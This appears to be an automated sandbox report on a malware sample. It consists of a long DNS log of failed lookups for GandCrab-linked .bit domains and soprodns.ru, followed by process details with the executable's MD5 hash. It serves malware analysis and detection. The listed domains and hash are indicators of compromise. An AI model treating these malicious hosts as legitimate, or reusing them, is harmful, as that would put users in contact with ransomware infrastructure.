Sep 1, 2022 00:03:02.865358114 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:02.922287941 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:02.942126989 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:02.945770025 CEST	8.8.8.8	192.168.2.3	0xe6aa	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.418770075 CEST	8.8.8.8	192.168.2.3	0x101c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.446106911 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:03.465781927 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.485872984 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:03.505850077 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.524724007 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:03.967163086 CEST	8.8.8.8	192.168.2.3	0xe6aa	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.580583096 CEST	8.8.8.8	192.168.2.3	0x1236	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.616434097 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:05.638950109 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.661201954 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:05.683096886 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.704983950 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:06.090673923 CEST	8.8.8.8	192.168.2.3	0x1236	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.253566980 CEST	8.8.8.8	192.168.2.3	0x32f7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.279741049 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:06.300148010 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.318766117 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:06.339133978 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.360065937 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:07.230133057 CEST	8.8.8.8	192.168.2.3	0xf50d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:07.261197090 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:07.297318935 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:07.321963072 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:07.345874071 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:07.367491961 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:08.672029018 CEST	8.8.8.8	192.168.2.3	0x5b1c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:08.740346909 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:08.766110897 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:08.827946901 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:08.846530914 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:08.866904974 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:11.907406092 CEST	8.8.8.8	192.168.2.3	0xb93e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:13.145453930 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:13.167514086 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:13.187902927 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:13.209469080 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:13.232753992 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:15.875538111 CEST	8.8.8.8	192.168.2.3	0x78aa	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.886709929 CEST	8.8.8.8	192.168.2.3	0x78aa	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.902874947 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:15.921664953 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.941783905 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:15.960310936 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.978528023 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:17.783536911 CEST	8.8.8.8	192.168.2.3	0x78aa	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:17.989558935 CEST	8.8.8.8	192.168.2.3	0xd2e7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.019994974 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:18.040131092 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.060370922 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:18.080894947 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.102590084 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:18.650096893 CEST	8.8.8.8	192.168.2.3	0xe3b2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.676616907 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:18.696774960 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.717092037 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:18.736999989 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.754909992 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:19.210956097 CEST	8.8.8.8	192.168.2.3	0x6266	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.238610029 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:19.258774996 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.276746988 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:19.296673059 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.316821098 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:19.696104050 CEST	8.8.8.8	192.168.2.3	0xd2e7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.938867092 CEST	8.8.8.8	192.168.2.3	0x8bb8	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.971436024 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:19.991856098 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.010216951 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:20.031111956 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.051709890 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:20.256568909 CEST	8.8.8.8	192.168.2.3	0x3233	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.283133984 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:20.303747892 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.323898077 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:20.344026089 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.366065979 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:21.609051943 CEST	8.8.8.8	192.168.2.3	0x9a4b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.641108990 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:21.663789988 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.686964035 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:21.708765030 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.729496956 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:22.926181078 CEST	8.8.8.8	192.168.2.3	0x6c47	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:22.956406116 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:22.978058100 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:22.999502897 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:23.021095037 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:23.042824030 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:23.514621973 CEST	8.8.8.8	192.168.2.3	0x6c47	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:23.968266010 CEST	8.8.8.8	192.168.2.3	0x878d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:23.997780085 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:24.018424988 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:24.039185047 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:24.059684038 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:24.078253031 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:25.255103111 CEST	8.8.8.8	192.168.2.3	0xa1ca	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.281069994 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:25.299524069 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.319861889 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:25.340485096 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.361062050 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:25.566684961 CEST	8.8.8.8	192.168.2.3	0xa11d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.593641996 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:25.611632109 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.631575108 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:25.649888039 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.669991970 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:25.946975946 CEST	8.8.8.8	192.168.2.3	0xa1ca	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.542138100 CEST	8.8.8.8	192.168.2.3	0x9a4b	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.874851942 CEST	8.8.8.8	192.168.2.3	0xc72e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.904150963 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:26.929198980 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.951956987 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:26.976304054 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.997859001 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:26.998966932 CEST	8.8.8.8	192.168.2.3	0xc72e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.328942060 CEST	8.8.8.8	192.168.2.3	0xb6ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.362921000 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:28.383085012 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.538108110 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:28.558254004 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.578342915 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:28.692234039 CEST	8.8.8.8	192.168.2.3	0xb6ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:29.338186979 CEST	8.8.8.8	192.168.2.3	0xe04e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:29.362001896 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:29.383466005 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:29.401654959 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:29.423216105 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:30.033303976 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:30.819206953 CEST	8.8.8.8	192.168.2.3	0x83d5	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:30.911178112 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:31.996062040 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.016911030 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:32.055161953 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.077513933 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:32.328344107 CEST	8.8.8.8	192.168.2.3	0x14b6	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.360487938 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:32.381845951 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.402843952 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:32.423881054 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.444027901 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:33.662503004 CEST	8.8.8.8	192.168.2.3	0xedca	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.694170952 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:33.714600086 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.735584974 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:33.755711079 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.774130106 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:34.005925894 CEST	8.8.8.8	192.168.2.3	0xa3fc	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:34.032443047 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:34.052963972 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:34.075452089 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:34.093806982 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:34.114725113 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:34.727765083 CEST	8.8.8.8	192.168.2.3	0xedca	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:35.952977896 CEST	8.8.8.8	192.168.2.3	0xbc05	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:35.979208946 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:36.000792027 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:36.022969007 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:36.044903994 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:36.066387892 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:37.278584003 CEST	8.8.8.8	192.168.2.3	0x25c4	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.308661938 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:37.330910921 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.351093054 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:37.372787952 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.393057108 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:38.649069071 CEST	8.8.8.8	192.168.2.3	0x8bc	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.677830935 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:38.699517965 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.719789982 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:38.740737915 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.761935949 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:39.094896078 CEST	8.8.8.8	192.168.2.3	0xbc05	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:40.677587986 CEST	8.8.8.8	192.168.2.3	0x8bc	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:41.002669096 CEST	8.8.8.8	192.168.2.3	0x25c4	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9gkAKTWOXp.exePID: 4664, Parent PID: 3920

General

Target ID:	1
Start time:	00:01:12
Start date:	01/09/2022
Path:	C:\Users\user\Desktop\9gkAKTWOXp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9gkAKTWOXp.exe"
Imagebase:	0x400000
File size:	75264 bytes
MD5 hash:	74E135B472B7496B371CE3BA3ACFEEA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
